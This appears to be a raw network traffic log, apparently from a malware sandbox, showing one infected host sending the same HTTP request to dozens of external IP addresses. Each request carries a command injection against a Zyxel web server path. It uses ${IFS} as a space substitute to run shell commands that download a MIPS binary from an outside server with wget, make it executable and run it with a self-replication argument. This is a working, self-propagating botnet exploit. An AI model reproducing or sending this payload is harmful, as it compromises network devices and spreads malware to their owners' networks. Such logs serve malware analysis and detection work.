                                            Feb 2, 2024 06:21:21.829035997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6732192.168.2.154093480.33.130.142443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.829061985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6733192.168.2.154461873.29.95.18443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.829106092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6734192.168.2.1535868155.153.228.148443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.829154015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6735192.168.2.1550434126.210.78.137443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.829174042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6736192.168.2.1543764182.53.124.186443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.829222918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6737192.168.2.1553338186.216.73.250443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.829267979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6738192.168.2.1557860149.8.85.175443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.829303026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6739192.168.2.1560798121.158.229.206443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.829334974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6740192.168.2.1552182115.96.56.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.829365969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6741192.168.2.154860648.221.245.121443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.829402924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6742192.168.2.1555954148.71.26.8443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.829448938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6743192.168.2.1552626129.154.84.71443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.829456091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6744192.168.2.15393508.205.132.169443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.829483986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6745192.168.2.155757837.109.183.242443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.829500914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6746192.168.2.1554800179.191.146.9443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.829533100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6747192.168.2.155876623.137.201.122443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.829556942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6748192.168.2.1538572118.236.180.139443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.829586029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6749192.168.2.1543802176.138.218.228443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.829632044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6750192.168.2.1542004128.134.131.176443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.829662085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6751192.168.2.1542980205.16.38.192443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.829714060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6752192.168.2.1545328118.129.102.59443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.829758883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6753192.168.2.1539974140.105.1.221443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.829783916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6754192.168.2.1539308114.14.77.181443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.829813004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6755192.168.2.153745077.153.2.33443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.829849005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6756192.168.2.1545040151.71.138.187443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.829864979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6757192.168.2.1545890164.70.132.24443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.829921007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6758192.168.2.1558628107.54.167.23443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.829966068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6759192.168.2.1541560196.220.66.115443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.830001116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6760192.168.2.1538656158.108.180.202443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.830049992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6761192.168.2.15529528.131.144.101443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.830075026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6762192.168.2.1554256171.94.180.118443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.830107927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6763192.168.2.1539600170.26.141.1443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.830158949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6764192.168.2.1537670117.5.39.119443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.830188036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6765192.168.2.155662627.178.251.162443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.830226898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6766192.168.2.1555338222.224.248.220443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.830275059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6767192.168.2.1557754124.120.29.73443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.830300093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6768192.168.2.1556204162.197.213.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.830327988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6769192.168.2.1547164223.184.99.230443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.830388069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6770192.168.2.1533738122.113.171.12443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.830430031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6771192.168.2.1547094104.233.185.218443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.830454111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6772192.168.2.154579054.216.55.125443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.830503941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6773192.168.2.155007276.164.1.214443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.830521107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6774192.168.2.1535864104.244.117.110443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.830565929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6775192.168.2.1541648190.191.170.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.830602884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6776192.168.2.1533790136.120.232.37443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.830646038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6777192.168.2.154785272.11.230.74443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.830683947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6778192.168.2.1557022183.207.173.39443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.830739975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6779192.168.2.1551904212.18.6.74443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.830770016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6780192.168.2.154627478.225.243.124443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.830794096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6781192.168.2.1546516196.215.230.181443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.830842972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6782192.168.2.155676627.101.211.248443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.830878973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6783192.168.2.1537638198.159.182.158443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.830888033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6784192.168.2.1537836216.225.140.174443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.830916882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6785192.168.2.155059443.141.249.140443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.830986977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6786192.168.2.15570025.174.231.152443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.831021070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6787192.168.2.155561635.202.237.108443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.831052065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6788192.168.2.154983884.84.120.173443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.831089020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6789192.168.2.1558124142.179.30.185443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.831127882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6790192.168.2.153971299.254.228.172443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.831157923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6791192.168.2.155138077.11.2.146443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.831185102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6792192.168.2.155841070.214.36.21443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.831228018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6793192.168.2.1536002170.12.210.80443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.831250906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6794192.168.2.1534592138.179.156.70443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.831301928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6795192.168.2.1556990112.74.31.106443
                                            TimestampBytes transferredDirectionData
